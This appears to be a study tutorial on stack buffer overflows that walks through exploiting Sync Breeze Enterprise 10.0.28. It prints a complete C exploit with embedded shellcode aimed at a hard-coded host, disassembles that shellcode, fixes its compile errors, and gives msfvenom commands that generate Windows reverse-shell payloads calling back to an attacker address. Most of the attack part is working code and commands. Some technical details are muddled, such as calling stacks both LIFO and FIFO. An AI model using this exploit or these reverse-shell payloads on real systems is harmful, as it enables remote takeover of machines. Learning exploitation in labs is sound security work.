Buffer Overflow attack
A buffer is an area in the RAM (Random Access Memory) reserved for temporary data storage. If a developer does not enforce buffer’s limits, an attacker could find a way to write data beyond those limits.
A stack is a data structure used to store the data. Two approaches: LIFO and FIFO
Two methods: push (adds elements to the stack) and pop (removes elements from the stack)
How it works
EIP is the memory pointer. NOP means a no operation instruction.
The general flow of a standard stack-based buffer overflow is straightforward. The exploit will:
- Create a large buffer to trigger the overflow.
- Take control of EIP by overwriting a return address on the stack, padding the large buffer with an appropriate offset.
- Include a chosen payload in the buffer prepended by an optional NOP sled. At the end of the attacker-supplied data, after the no-op instructions, the attacker places an instruction to perform a relative jump to the top of the buffer where the shellcode is located. This collection of no-ops is referred to as the "NOP-slide" because if the return address is overwritten with any address within the no-op region of the buffer, the execution will "slide" down the no-ops until it is redirected to the actual malicious code by the jump at the end. This technique requires the attacker to guess where on the stack the NOP-slide is instead of the comparatively small shellcode
- Choose a correct return address instruction such as JMP ESP (or a different register) to redirect the execution flow to the payload.
So the difficult part of this exploitation technique is finding the return address.
One would be randomization of the Memory space and the other would be the creation of areas in the memory for non executable code.
- Address Space Layout Randomization (ASLR)
- and Executable Space Protection,
Sync Breeze Enterprise 10.0.28
| searchsploit "Sync Breeze Enterprise 10.0.28"
|
| ----------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------- ---------------------------------
Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC) | windows/dos/43200.py
Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow | windows/remote/42928.py
Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow (PoC) | windows/dos/42341.c
---------------------------------------------------------------------------------------------- --------
Shellcodes: No Results
|
We have this exploit:
| /*
Sync Breeze Enterprise BOF - Ivan Ivanovic Ivanov Иван-дурак
недействительный 31337 Team
*/
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define DEFAULT_BUFLEN 512
#include <inttypes.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
DWORD SendRequest(char *request, int request_size) {
WSADATA wsa;
SOCKET s;
struct sockaddr_in server;
char recvbuf[DEFAULT_BUFLEN];
int recvbuflen = DEFAULT_BUFLEN;
int iResult;
printf("\n[>] Initialising Winsock...\n");
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
{
printf("[!] Failed. Error Code : %d", WSAGetLastError());
return 1;
}
printf("[>] Initialised.\n");
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
printf("[!] Could not create socket : %d", WSAGetLastError());
}
printf("[>] Socket created.\n");
server.sin_addr.s_addr = inet_addr("172.16.116.222");
server.sin_family = AF_INET;
server.sin_port = htons(8080);
if (connect(s, (struct sockaddr *)&server, sizeof(server)) < 0)
{
puts("[!] Connect error");
return 1;
}
puts("[>] Connected");
if (send(s, request, request_size, 0) < 0)
{
puts("[!] Send failed");
return 1;
}
puts("\n[>] Request sent\n");
closesocket(s);
return 0;
}
void EvilRequest() {
char request_one[] = "POST /login HTTP/1.1\r\n"
"Host: 172.16.116.222\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
"Accept-Language: en-US,en;q=0.5\r\n"
"Referer: http://172.16.116.222/login\r\n"
"Connection: close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: ";
char request_two[] = "\r\n\r\nusername=";
int initial_buffer_size = 780;
char *padding = malloc(initial_buffer_size);
memset(padding, 0x41, initial_buffer_size);
memset(padding + initial_buffer_size - 1, 0x00, 1);
unsigned char retn[] = "\xcb\x75\x52\x73"; //ret at msvbvm60.dll
unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" // NOP SLIDE
"\xdb\xda\xbd\x92\xbc\xaf\xa7\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x52\x31\x68\x17\x83\xc0\x04\x03\xfa\xaf\x4d\x52\x06\x27\x13"
"\x9d\xf6\xb8\x74\x17\x13\x89\xb4\x43\x50\xba\x04\x07\x34\x37"
"\xee\x45\xac\xcc\x82\x41\xc3\x65\x28\xb4\xea\x76\x01\x84\x6d"
"\xf5\x58\xd9\x4d\xc4\x92\x2c\x8c\x01\xce\xdd\xdc\xda\x84\x70"
"\xf0\x6f\xd0\x48\x7b\x23\xf4\xc8\x98\xf4\xf7\xf9\x0f\x8e\xa1"
"\xd9\xae\x43\xda\x53\xa8\x80\xe7\x2a\x43\x72\x93\xac\x85\x4a"
"\x5c\x02\xe8\x62\xaf\x5a\x2d\x44\x50\x29\x47\xb6\xed\x2a\x9c"
"\xc4\x29\xbe\x06\x6e\xb9\x18\xe2\x8e\x6e\xfe\x61\x9c\xdb\x74"
"\x2d\x81\xda\x59\x46\xbd\x57\x5c\x88\x37\x23\x7b\x0c\x13\xf7"
"\xe2\x15\xf9\x56\x1a\x45\xa2\x07\xbe\x0e\x4f\x53\xb3\x4d\x18"
"\x90\xfe\x6d\xd8\xbe\x89\x1e\xea\x61\x22\x88\x46\xe9\xec\x4f"
"\xa8\xc0\x49\xdf\x57\xeb\xa9\xf6\x93\xbf\xf9\x60\x35\xc0\x91"
"\x70\xba\x15\x35\x20\x14\xc6\xf6\x90\xd4\xb6\x9e\xfa\xda\xe9"
"\xbf\x05\x31\x82\x2a\xfc\xd2\x01\xba\x8a\xef\x32\xb9\x72\xe1"
"\x9e\x34\x94\x6b\x0f\x11\x0f\x04\xb6\x38\xdb\xb5\x37\x97\xa6"
"\xf6\xbc\x14\x57\xb8\x34\x50\x4b\x2d\xb5\x2f\x31\xf8\xca\x85"
"\x5d\x66\x58\x42\x9d\xe1\x41\xdd\xca\xa6\xb4\x14\x9e\x5a\xee"
"\x8e\xbc\xa6\x76\xe8\x04\x7d\x4b\xf7\x85\xf0\xf7\xd3\x95\xcc"
"\xf8\x5f\xc1\x80\xae\x09\xbf\x66\x19\xf8\x69\x31\xf6\x52\xfd"
"\xc4\x34\x65\x7b\xc9\x10\x13\x63\x78\xcd\x62\x9c\xb5\x99\x62"
"\xe5\xab\x39\x8c\x3c\x68\x59\x6f\x94\x85\xf2\x36\x7d\x24\x9f"
"\xc8\xa8\x6b\xa6\x4a\x58\x14\x5d\x52\x29\x11\x19\xd4\xc2\x6b"
"\x32\xb1\xe4\xd8\x33\x90";
char request_three[] = "&password=A";
int content_length = 9 + strlen(padding) + strlen(retn) + strlen(shellcode) + strlen(request_three);
char *content_length_string = malloc(15);
sprintf(content_length_string, "%d", content_length);
int buffer_length = strlen(request_one) + strlen(content_length_string) + initial_buffer_size + strlen(retn) + strlen(request_two) + strlen(shellcode) + strlen(request_three);
char *buffer = malloc(buffer_length);
memset(buffer, 0x00, buffer_length);
strcpy(buffer, request_one);
strcat(buffer, content_length_string);
strcat(buffer, request_two);
strcat(buffer, padding);
strcat(buffer, retn);
strcat(buffer, shellcode);
strcat(buffer, request_three);
SendRequest(buffer, strlen(buffer));
}
int main() {
EvilRequest();
return 0;
}
|
To understand what it's doing, we will analyze the shellcode:
- Bytes → Assembly
- Assembly → Logical blocks
- Logical blocks → High-level behavior
| cat > shellcode.bin << 'EOF'
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
\xdb\xda\xbd\x92\xbc\xaf\xa7\xd9\x74\x24\xf4\x58\x31\xc9\xb1
\x52\x31\x68\x17\x83\xc0\x04\x03\xfa\xaf\x4d\x52\x06\x27\x13
\x9d\xf6\xb8\x74\x17\x13\x89\xb4\x43\x50\xba\x04\x07\x34\x37
\xee\x45\xac\xcc\x82\x41\xc3\x65\x28\xb4\xea\x76\x01\x84\x6d
\xf5\x58\xd9\x4d\xc4\x92\x2c\x8c\x01\xce\xdd\xdc\xda\x84\x70
\xf0\x6f\xd0\x48\x7b\x23\xf4\xc8\x98\xf4\xf7\xf9\x0f\x8e\xa1
\xd9\xae\x43\xda\x53\xa8\x80\xe7\x2a\x43\x72\x93\xac\x85\x4a
\x5c\x02\xe8\x62\xaf\x5a\x2d\x44\x50\x29\x47\xb6\xed\x2a\x9c
\xc4\x29\xbe\x06\x6e\xb9\x18\xe2\x8e\x6e\xfe\x61\x9c\xdb\x74
\x2d\x81\xda\x59\x46\xbd\x57\x5c\x88\x37\x23\x7b\x0c\x13\xf7
\xe2\x15\xf9\x56\x1a\x45\xa2\x07\xbe\x0e\x4f\x53\xb3\x4d\x18
\x90\xfe\x6d\xd8\xbe\x89\x1e\xea\x61\x22\x88\x46\xe9\xec\x4f
\xa8\xc0\x49\xdf\x57\xeb\xa9\xf6\x93\xbf\xf9\x60\x35\xc0\x91
\x70\xba\x15\x35\x20\x14\xc6\xf6\x90\xd4\xb6\x9e\xfa\xda\xe9
\xbf\x05\x31\x82\x2a\xfc\xd2\x01\xba\x8a\xef\x32\xb9\x72\xe1
\x9e\x34\x94\x6b\x0f\x11\x0f\x04\xb6\x38\xdb\xb5\x37\x97\xa6
\xf6\xbc\x14\x57\xb8\x34\x50\x4b\x2d\xb5\x2f\x31\xf8\xca\x85
\x5d\x66\x58\x42\x9d\xe1\x41\xdd\xca\xa6\xb4\x14\x9e\x5a\xee
\x8e\xbc\xa6\x76\xe8\x04\x7d\x4b\xf7\x85\xf0\xf7\xd3\x95\xcc
\xf8\x5f\xc1\x80\xae\x09\xbf\x66\x19\xf8\x69\x31\xf6\x52\xfd
\xc4\x34\x65\x7b\xc9\x10\x13\x63\x78\xcd\x62\x9c\xb5\x99\x62
\xe5\xab\x39\x8c\x3c\x68\x59\x6f\x94\x85\xf2\x36\x7d\x24\x9f
\xc8\xa8\x6b\xa6\x4a\x58\x14\x5d\x52\x29\x11\x19\xd4\xc2\x6b
\x32\xb1\xe4\xd8\x33\x90
EOF
|
Now convert hex escapes → raw bytes:
| echo -ne "$(cat shellcode.bin)" > shellcode.raw
|
Disassemble with ndisasm (32-bit x86):
| ndisasm -b 32 shellcode.raw
|
Output:
| 00000000 90 nop
00000001 90 nop
00000002 90 nop
00000003 90 nop
00000004 90 nop
00000005 90 nop
00000006 90 nop
00000007 90 nop
00000008 90 nop
00000009 90 nop
0000000A 90 nop
0000000B 90 nop
0000000C 90 nop
0000000D 90 nop
0000000E 90 nop
0000000F 0ADB or bl,bl
00000011 DABD92BCAFA7 fidivr dword [ebp-0x5850436e]
00000017 D97424F4 fnstenv [esp-0xc]
0000001B 58 pop eax
0000001C 31C9 xor ecx,ecx
0000001E B10A mov cl,0xa
00000020 52 push edx
00000021 316817 xor [eax+0x17],ebp
00000024 83C004 add eax,byte +0x4
00000027 03FA add edi,edx
00000029 AF scasd
0000002A 4D dec ebp
0000002B 52 push edx
0000002C 06 push es
0000002D 27 daa
0000002E 130A adc ecx,[edx]
00000030 9D popf
00000031 F6B874171389 idiv byte [eax-0x76ece88c]
00000037 B443 mov ah,0x43
00000039 50 push eax
0000003A BA04073437 mov edx,0x37340704
0000003F 0AEE or ch,dh
00000041 45 inc ebp
00000042 AC lodsb
00000043 CC int3
00000044 82 db 0x82
00000045 41 inc ecx
00000046 C3 ret
00000047 6528B4EA7601846D sub [gs:edx+ebp*8+0x6d840176],dh
0000004F 0AF5 or dh,ch
00000051 58 pop eax
00000052 D9 db 0xd9
00000053 4D dec ebp
00000054 C4922C8C01CE les edx,[edx-0x31fe73d4]
0000005A DDDC fstp st4
0000005C DA84700AF06FD0 fiadd dword [eax+esi*2-0x2f900ff6]
00000063 48 dec eax
00000064 7B23 jpo 0x89
00000066 F4 hlt
00000067 C898F4F7 enter 0xf498,0xf7
0000006B F9 stc
0000006C 0F8EA10AD9AE jng near 0xaed90b13
00000072 43 inc ebx
00000073 DA53A8 ficom dword [ebx-0x58]
00000076 80E72A and bh,0x2a
00000079 43 inc ebx
0000007A 7293 jc 0xf
0000007C AC lodsb
0000007D 854A0A test [edx+0xa],ecx
00000080 5C pop esp
00000081 02E8 add ch,al
00000083 62AF5A2D4450 bound ebp,[edi+0x50442d5a]
00000089 2947B6 sub [edi-0x4a],eax
0000008C ED in eax,dx
0000008D 2A9C0AC429BE06 sub bl,[edx+ecx+0x6be29c4]
00000094 6E outsb
00000095 B918E28E6E mov ecx,0x6e8ee218
0000009A FE db 0xfe
0000009B 61 popa
0000009C 9C pushf
0000009D DB db 0xdb
0000009E 740A jz 0xaa
000000A0 2D81DA5946 sub eax,0x4659da81
000000A5 BD575C8837 mov ebp,0x37885c57
000000AA 237B0C and edi,[ebx+0xc]
000000AD 13F7 adc esi,edi
000000AF 0AE2 or ah,dl
000000B1 15F9561A45 adc eax,0x451a56f9
000000B6 A207BE0E4F mov [0x4f0ebe07],al
000000BB 53 push ebx
000000BC B34D mov bl,0x4d
000000BE 180A sbb [edx],cl
000000C0 90 nop
000000C1 FE db 0xfe
000000C2 6D insd
000000C3 D8BE891EEA61 fdivr dword [esi+0x61ea1e89]
000000C9 228846E9EC4F and cl,[eax+0x4fece946]
000000CF 0AA8C049DF57 or ch,[eax+0x57df49c0]
000000D5 EBA9 jmp short 0x80
000000D7 F693BFF96035 not byte [ebx+0x3560f9bf]
000000DD C0910A70BA1535 rcl byte [ecx+0x15ba700a],byte 0x35
000000E4 2014C6 and [esi+eax*8],dl
000000E7 F690D4B69EFA not byte [eax-0x561492c]
000000ED DAE9 fucompp
000000EF 0ABF0531822A or bh,[edi+0x2a823105]
000000F5 FC cld
000000F6 D201 rol byte [ecx],cl
000000F8 BA8AEF32B9 mov edx,0xb932ef8a
000000FD 72E1 jc 0xe0
000000FF 0A9E34946B0F or bl,[esi+0xf6b9434]
00000105 110F adc [edi],ecx
00000107 04B6 add al,0xb6
00000109 38DB cmp bl,bl
0000010B B537 mov ch,0x37
0000010D 97 xchg eax,edi
0000010E A6 cmpsb
0000010F 0AF6 or dh,dh
00000111 BC1457B834 mov esp,0x34b85714
00000116 50 push eax
00000117 4B dec ebx
00000118 2DB52F31F8 sub eax,0xf8312fb5
0000011D CA850A retf 0xa85
00000120 5D pop ebp
00000121 6658 pop ax
00000123 42 inc edx
00000124 9D popf
00000125 E141 loope 0x168
00000127 DD db 0xdd
00000128 CAA6B4 retf 0xb4a6
0000012B 149E adc al,0x9e
0000012D 5A pop edx
0000012E EE out dx,al
0000012F 0A8EBCA676E8 or cl,[esi-0x17895944]
00000135 047D add al,0x7d
00000137 4B dec ebx
00000138 F785F0F7D395CC0A test dword [ebp-0x6a2c0810],0x5ff80acc
-F85F
00000142 C180AE09BF6619 rol dword [eax+0x66bf09ae],byte 0x19
00000149 F8 clc
0000014A 6931F652FD0A imul esi,[ecx],dword 0xafd52f6
00000150 C434657BC91013 les esi,[0x1310c97b]
00000157 6378CD arpl [eax-0x33],di
0000015A 629CB599620AE5 bound ebx,[ebp+esi*4-0x1af59d67]
00000161 AB stosd
00000162 398C3C68596F94 cmp [esp+edi-0x6b90a698],ecx
00000169 85F2 test edx,esi
0000016B 367D24 ss jnl 0x192
0000016E 9F lahf
0000016F 0AC8 or cl,al
00000171 A86B test al,0x6b
00000173 A6 cmpsb
00000174 4A dec edx
00000175 58 pop eax
00000176 145D adc al,0x5d
00000178 52 push edx
00000179 2911 sub [ecx],edx
0000017B 19D4 sbb esp,edx
0000017D C26B0A ret 0xa6b
00000180 32B1E4D83390 xor dh,[ecx-0x6fcc271c]
|
Some instructions (like fcmovnu) are intentional junk — they are used because:
- They don’t contain bad chars
- They don’t crash
- They help hide real logic
So the goal will be now to identify the REAL execution path, where the execution actually flows. Look for control-flow instructions: JMP, CALL, RET. And keep going that path to reverse engineer this.
But let's continue with this buffer overflow exploitation. We can use mingw-w64 to compile the code into a Windows Portable Executable (PE) file.
| i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe
|
Error message:
| /usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x2e): undefined reference to `_imp__WSAStartup@8'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x3c): undefined reference to `_imp__WSAGetLastError@0'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x80): undefined reference to `_imp__socket@12'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x93): undefined reference to `_imp__WSAGetLastError@0'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0xbd): undefined reference to `_imp__inet_addr@4'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0xdd): undefined reference to `_imp__htons@4'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x106): undefined reference to `_imp__connect@12'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x14f): undefined reference to `_imp__send@16'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccgrxnRz.o:42341.c:(.text+0x182): undefined reference to `_imp__closesocket@4'
collect2: error: ld returned 1 exit status
|
Something went wrong during the compilation process and although the errors from Listing 8 may be unfamiliar, a simple Google search for the first error related to "WSAStartup" reveals that this is a function found in winsock.h. Further research indicates that these errors occur when the linker cannot find the winsock library, and that adding the -lws2_32 parameter to the i686-w64-mingw32-gcc command should fix the problem.
| i686-w64-mingw32-gcc 42341.c -o syncbreeze_exploit.exe -lws2_32
|
But before that let's modify the exploit like this:
Since bad characters are already listed in the Python exploit, we can generate our own payload with msfvenom, remembering to target the x86 platform and format it for C code:
| msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.157 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
|
Modify the obtained shell code then into the payload.
Another payload with shellcode is:
| msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.157 LPORT=1990 -f python -b "\x00\x20" -v shellcode
|